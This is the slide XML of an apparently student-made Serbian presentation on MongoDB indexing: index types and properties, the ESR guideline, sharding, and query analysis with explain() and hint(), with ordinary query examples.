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05014f59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a05014f59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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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05014f59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a05014f59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a05014f59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a05014f59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05014f59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a05014f59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a05014f59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a05014f59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05014f59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05014f59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05014f59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a05014f59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05014f59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05014f59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05014f59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a05014f59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05014f59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a05014f59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05014f59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05014f59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05014f59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05014f59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05014f59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a05014f59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05014f596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05014f59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05014f596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a05014f59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05014f596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a05014f59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05014f59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a05014f59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05014f596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a05014f59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05014f59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a05014f59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05014f59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a05014f59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a05014f596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a05014f59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a05014f59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a05014f59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a05014f596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a05014f596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05014f596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a05014f596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05014f596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05014f59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a08453734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a08453734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a08453734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a08453734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a08453734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a08453734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a08453734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a08453734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08453734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a08453734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a08453734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a08453734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05014f596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a05014f596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a05014f59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a05014f59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a05014f596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a05014f596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05014f596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a05014f596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05014f59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a05014f59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0e14db9a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a0e14db9a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05014f59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a05014f59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a0e14db9a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a0e14db9a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0e14db9a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a0e14db9a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0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a1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a0e14db9a1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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a1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a0e14db9a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a05014f59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a05014f59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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a1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a0e14db9a1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a0e14db9a1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a0e14db9a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a0e14db9a1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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a1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a0e14db9a1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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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a0e14db9a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0e14db9a1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0e14db9a1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a05014f59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a05014f59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a05014f596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a05014f596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a05014f596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a05014f596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a05014f596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a05014f596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a0e14db9a1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a0e14db9a1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a0e14db9a1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a0e14db9a1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a0e14db9a1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a0e14db9a1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a0e14db9a1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a0e14db9a1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a0e14db9a1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a0e14db9a1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a0e14db9a1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a0e14db9a1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05014f59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a05014f59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a05014f596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a05014f596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a0e14db9a1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a0e14db9a1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a05014f596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a05014f596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a05014f596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a05014f59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a05014f596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a05014f596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a05014f596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a05014f596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a08453734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a08453734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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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05014f59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a05014f59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a05014f596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a05014f596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a05014f596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a05014f596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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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a0ab5ecdd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0ab5ecdd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0ab5ecdd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3802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Sistemi za upravljanje bazama podataka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212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Profesor:                                							Student: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Prof. dr Aleksandar Stanimirović                    				Teodora Kalezić, 1929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 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Compound indeksi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lang="en"/>
              <a:t>ndeks nad više polja u okviru dokumenta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Redosled definisanja polja od velike važnosti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Primer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> pretraga studenata na osnovu nivoa studija, studijskog programa i broja indeksa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Rezultujuće stablo se sastoji od ključeva koji sadrže sva definisana polja nad kojima je indeks kreiran, prateći definisan redosled sleva nadesno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Prefix kompresija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Uzastopni ključevi često dele zajednički prefiks, u memoriji se čuvaju samo razlike između vrednosti susednih ključeva, što smanjuje zauzeće memorije =&gt; Indeksi čija prva polja imaju nisku kardinalnost će obično zauzimati manje memorijskog prostora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1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Operacije čitanja i upisa - primer 2 - Read Preference</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685" name="Google Shape;685;p112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="752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Zatim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>se čvorovi </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> zaustavljaju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mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> čvor se povlači sa mesta primarnog, te su i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> sekundarni čvorovi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Kao posledica navođenja primary </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Read Preference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> svojstva, nije moguće izvršavati operacije čitanja nad preostalim čvorovima</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="686" name="Google Shape;68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900" y="2438325"/>
            <a:ext cx="5944201" cy="25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Operacije čitanja i upisa - primer 2 - Read Preference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Ukoliko bi se povezivanje na neki od preostalih čvorova izvršilo korišćenjem konekcionog stringa u kome se navodi Read Preference svojstvo kao što je </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>secondary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, operacije čitanja bi bile uspešno izvršene:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="693" name="Google Shape;69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025" y="2409975"/>
            <a:ext cx="7141950" cy="23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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Multikey indeksi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Koriste se kada je potrebno indeksirati polje koje predstavlja niz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Primer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> veterinarska stanica gde životinje sadrže niz rasa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Moguće je koristiti u kombinaciji sa Compound indeksima, ali je moguće definisati samo jedno polje koje predstavlja niz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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wildcard indeksi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Wildcard indeksi se koriste kada je potrebno kreirati indeks nad nepoznatim poljem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Primer korišćenja je kada se polja u dokumentima iste kolekcije ili polja ugnježdenih dokumenata razlikuju ili kada su sklona promenama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Primer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Kolekcija proizvoda sadrži ugnježdena dokumenta o atributima, gde neki proizvodi sadrže niz materijala i dimenzije, dok drugi sadrže niz boja i specifikaciju težine i jedinica. U ovom slučaju se može definisati Wildcard indeks nad poljima koja se nalaze unutar ugnježdenog dokumenta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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Geospatial (2d, 2dsphere) indeksi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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reiraju se nad </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>GeoJSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ili </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Legacy Coordinate Pairs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> objektima, koji definišu koordinate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GeoJSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - definišu geometrijske oblike kao što su tačke, linije, poligoni i složeniji objekti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Legacy Coordinate Pairs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- sastoje se od para koordinata: geografske dužine i geografske širine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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hashed indeksi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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>rikupljaju i čuvaju heš vrednosti indeksiranog polja umesto originalnih vrednosti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Primarna namena je kod </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Sharding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>procesa gde se mogu koristiti heširani </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Shard ključevi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omogućuju uniformnu distribuciju podataka kroz </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Sharded klaster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nisu pogodni za pretragu po opsegu vrednosti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Svojstva indeksa (Properties)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Case-Insensitive indeksi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Hidden indeksi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Partial indeksi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Sparse indeksi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TTL indeksi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Unique indeksi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Case-Insensitive indeksi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;14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lang="en"/>
              <a:t>ndeksi koji dozvoljavaju pretragu string vrednosti bez obaziranja na to da li su slova mala ili velika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strength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> polje - vrednosti </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> se koriste za case-insensitivity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Hidden indeksi</a:t>
            </a:r>
            <a:endParaRPr/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lang="en"/>
              <a:t>ndeksi koji su sakriveni od Query Planner-a, koji će ignorisati njihovo postojanje prilikom izvršavanja upita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Koriste se da bi se procenile performanse upita ukoliko indeks ne bi postojao, kao i da se ne bi indeks brisao u cilju testiranja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Partial indeksi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ada je potrebno indeksirati samo deo dokumenata iz kolekcije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Definiše se izraz koji ima ulogu filtera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Benefit ovakvih indeksa je manje memorijsko zauzeće, kao i manji zahtevi prilikom kreiranja i njihovog održavanja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Parcijalni indeksi nude sličan skup funkcionalnosti kao i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Sparse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> indeksi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Sparse indeksi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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>oriste se kada je potrebno indeksirati samo dokumenta koja sadrže polje nad kojima je kreiran indeks, čak i ako to polje sadrži null vrednost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Ponašanje Sparse indeksa se može simulirati i korišćenjem Partial indeksa, koji nude dodatnu mogućnost filtriranja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b="1" lang="en"/>
              <a:t>Interna struktura i organizacija indeksa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kod MongoDB baze podataka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TTL (Time To Live) indeksi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Potkategorija Single Field indeksa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efiniše dokumenta koja je potrebno obrisati u određenom vremenskom trenutku ili nakon određenog vremena, kao što su log-ovi koje je potrebno čuvati samo privremeno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 MongoDB procesu (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) postoji pozadinska nit koja čita vrednosti u kreiranom indeksu i uklanja zastarela dokumenta iz kolekcije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Unique indeksi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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>olje koje je indeksirano Unique indeksom neće prihvatati duplikate u okviru kolekcije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Moguće je primeniti nad Single Field, Compound i Multikey indeksima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Moguće je primeniti nad Partial indeksima, ali će se Unique ograničenje primenjivati samo nad dokumentima koja odgovaraju definisanom filteru pri kreiranju Partial indeksa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Nemoguće je pripisati Unique svojstvo već postojećem indeksu ukoliko kolekcija već sadrži duplikate vrednosti polja nad kojima je indeks kreiran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Efikasno korišćenje indeksa i uobičajene greške</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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ESR Guideline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Kardinalnost i selektivnost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Kreiranje velikog broja indeksa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Trenutak kreiranja indeksa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Neadekvatno formiranje upita i Covered upiti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Neefikasni upiti kod Compound indeksa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Uticaj Write operacija na indekse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Sortiranje i indeksi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ESR Guideline</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;18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Equality-Sort-Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reporuka koja govori o redosledu definisanja polja prilikom kreiranja Compound indeksa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Equality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Prva polja koja se navode u indeksu treba da odgovaraju uslovima jednakosti u upitu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Sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Nakon polja jednakosti, u indeksu se definišu polja po kojima će se vršiti sortiranje rezultata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Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Na kraju se navode filteri koji se odnose na opseg vrednosti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Jednakost mora biti prvi filter, dok redosled navođenja kriterijuma sortiranja i pretrage opsega vrednosti mogu zavisiti od potreba sistema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Kardinalnost i selektivnost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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="682025"/>
            <a:ext cx="8520600" cy="4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K</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>ardinalnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> govori o tome koliko različitih vrednosti neki atribut može uzeti iz skupa mogućih vrednosti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Atributi mogu biti visoke ili niske kardinalnosti, gde se polja niske kardinalnosti navode kao primer kada nikako ne bi trebalo koristiti indekse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Selektivnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> može biti kriterijum za efikasno kreiranje indeksa i u slučajevima niske kardinalnosti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Primer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> status porudžbine u sistemu </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>obrađena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>neobrađena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Pojava </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>desno-balansiranog stabla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>gde su identifikatori porudžbina </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>monotono rastuće vrednosti</a:t>
            </a:r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450" y="2477650"/>
            <a:ext cx="2872324" cy="23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Kreiranje velikog broja indeksa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Korisnost indeksa zavisi od načina na koji je upit kreiran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Kreiranje velikog broja indeksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> dovodi do velikih memorijskih opterećenja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 realnim sistemima je potrebno vršiti pregled statistike kreiranih indeksa kako bi se ustanovilo koliko se često koriste, kao i njihova optimalnost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Trenutak kreiranja indeksa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Moguće je kreirati indekse pre ili nakon izvršenja velikog broja operacija upisa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 prvom slučaju će svi podaci koji se unose biti indeksirani u toku operacije upisa =&gt; duže vreme izvršenja operacija upisa, ali će operacije čitanja biti brže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 drugom slučaju će biti suprotan slučaj: sporije operacije čitanja jer bi dolazilo do skeniranja čitave kolekcije prilikom pretrage, dok bi operacije upisa bile brže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Neadekvatno formiranje upita i Covered upiti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Pojedini upiti ne koriste indekse u pozadini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Primer:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pretraga stringova bez navođenja prefiksa. Čak i ako postoji indeks nad atributom, u toku izvršenja ovakvog upita indeks ne bi bio iskorišćen jer ne postoji početna vrednost stringa nad kojom bi se mogla izvršiti pretraga, te bi se vršilo skeniranje čitave kolekcije</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>db.studenti.find({ prezime: /vić$/ })</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, tj.</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>WHERE prezime LIKE '%vić'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Covered upit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - upit koji maksimalno koristi indeks. Svi podaci potrebni za izvršavanje pretrage nalaze se u okviru samog indeksa, te nije potreban pristup dokumentima u kolekciji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Neefikasni upiti kod Compound indeksa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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>otrebno je obratiti pažnju na redosled atributa prilikom formiranja Compound indeksa jer MongoDB koristi </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>prefiks pravilo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Indeks neće biti iskorišćen ukoliko se vrši pretraga dokumenata pomoću redosleda atributa različitog od specificiranog u toku kreiranja indeksa, tj. sleva nadesno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Moguće je ne navesti poslednje atribute ukoliko oni pre njih navedeni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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uticaj Write operacija na indekse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Od</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ržavanje većeg broja indeksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> značajno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> usporava Write operacije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Svaka Insert, Update ili Delete operacija zahteva ažuriranje konkretnog dokumenta, ali i svih povezanih indeksa, što može uticati negativno na performanse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Može biti problematično kod Write-heavy sistema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Važno je pratiti iskorišćenost i metrike indeksa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311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sz="3600"/>
              <a:t>Sadržaj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Organizacija stabla u WiredTiger-u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Non-clustered indeksi i Clustered Collections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Tipovi indeksa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Svojstva indeksa (Properties)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Efikasno korišćenje indeksa i uobičajene greške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Sharding i indeksi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Analiza performansi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Sortiranje i indeksi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Indeksi u MongoDB-u se ne koriste samo u cilju brže pretrage, već i za sortiranje rezultata upita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Rezultujuće strukture indeksa su već uređene po vrednostima ključa, te se izbegava dodatno sortiranje u memoriji pri izvršenju upita (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>In-memory Sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, koji je značajno sporiji)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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="13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Sharding i indeksi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="707875"/>
            <a:ext cx="8520600" cy="41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Sharding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - proces koji omoćuje horizontalno particionisanje podataka, gde se podaci raspodeljuju na više servera i cilj je smanjivanje opterećenja ukoliko se baza podataka oslanja na jedan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Svaki server se naziva </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Shard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, a ceo sistem </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Sharded Cluster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Odlučivanje gde će se koji dokument naći se vrši na osnovu </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Shard Key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Efikasnost Sharding procesa u velikoj meri zavisi od korišćenja indeksa, jer se pri kreiranju Sharded kolekcije uvek automatski kreira indeks nad Shard ključem. Ovaj indeks je neophodan da bi kolekcija mogla biti Sharded, a omogućuje i brzo izvršavanje upita na svakom Shard-u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Indeks nad Shard ključem može biti jednostavan indeks ili Compound indeks, gde Shard ključ mora predstavljati prefiks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 ovu svrhu se takođe mogu koristiti i Hashed indeksi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 performansi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Google Shape;241;p4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explain()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - informacije o planu izvršenja upita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hint() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- koristi se da bi se Query Planner-u označilo koji indeks je potrebno iskoristiti u toku izvršenja upita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indexStats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- agregaciona faza koja pruža uvid u to koliko se često indeksi u okviru jedne kolekcije koriste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Dodatne metrike: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/>
              <a:t>serverStatus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- globalne metrike rada MongoDB servera, uključujući metrike koje se odnose na izvršavanje upita u kontekstu indeksa: koliko je ukupno dokumenata skenirano od strane Query Executor-a, kao i broj upita kod kojih je bilo neophodno dodatno sortiranje podataka u memoriji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/>
              <a:t>collStats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- statistike o određenoj kolekciji. Sadrži ukupne i pojedinačne veličine indeksa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/>
              <a:t>dbStats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- sadrži informacije o čitavoj bazi podataka, uključujući ukupan broj indeksa u svim kolekcijama, kao i ukupnu veličinu svih indeksa u svim kolekcijama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 explain()</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;24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Neke od informacija koje se mogu videti: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tip skeniranja koji je izvršen (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>COLLSCAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>IXSCAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>FETCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>EXPRESS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broj vraćenih dokumenata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broj skeniranih dokumenata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ukoliko je iskorišćen indeks, prikazuje se i njegov naziv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vreme izvršenja upita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detaljnije optimizacije koje je Query Planner izvršio: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winningPlan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rejectedPlans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1. explain()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Primer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> kolekcija studenata od 10,000 dokumenata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Scenario 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> pretraga nad poljem </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>broj_indeksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> kada ne postoji indeks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5" y="2050525"/>
            <a:ext cx="8653849" cy="28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1. explain()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Scenario 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> pretraga nad poljem </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>broj_indeksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> kada postoji indeks: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db.studenti.createIndex( { broj_indeksa: 1 }, { unique: true } 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00" y="2248000"/>
            <a:ext cx="8598201" cy="28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hint()</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;26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Primer: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>idx_smer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>idx_smer_godina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>idx_smer_godina_prosek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Upit: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db.studenti.find({ </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  smer: "Računarstvo i informatika", </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  godina: 3 </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>}).sort({ prosek: -1 }).hint(&lt;polja_indeksa&gt;).explain("allPlansExecution")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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222750" y="118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hint()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;27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125" y="706137"/>
            <a:ext cx="7181852" cy="430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hint()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280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Broj skeniranih ključeva i dokumenata je značajno veći prilikom korišćenja indeksa </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>idx_smer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> jer indeks vrši filtriranje samo po smeru, dok kod ostalih indeksa vrši i po smeru i po godini studija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Nakon primenjivanja indeksa, indeks </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>idx_smer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> sadrži filtriranje dokumenata po godini studija u okviru </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>FETCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> faze, dok ostali indeksi koriste B-stablo radi pronalaženja dokumenata po zadatom smeru i godini studija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Indeksi </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>idx_smer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>idx_smer_godina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> sadrže po </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>SORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> fazu koja sortira podatke po proseku u memoriji. U oba slučaja je količina podataka jednaka jer je u pitanju isti broj dokumenata. Kod indeksa </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>idx_smer_godina_prosek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ova faza ne postoji jer B-stablo već sadrži sortirane podatke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b="1" lang="en"/>
              <a:t>Napadi na baze podataka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SQL Injection, NoSQL Injection, Timing Attacks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15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Organizacija stabla u WiredTiger-u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728525"/>
            <a:ext cx="8520600" cy="4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MongoDB koristi WiredTiger Storage Engine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lang="en"/>
              <a:t>ndeksi se implementiraju korišćenjem strukture B+ stabla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 okviru WiredTiger dokumentacije se implementacija naziva B-stablom radi jednostavnosti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Čvorovi stabla predstavljaju stranice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Koren i svi ostali čvorovi osim listova (tzv. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>čvorovi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
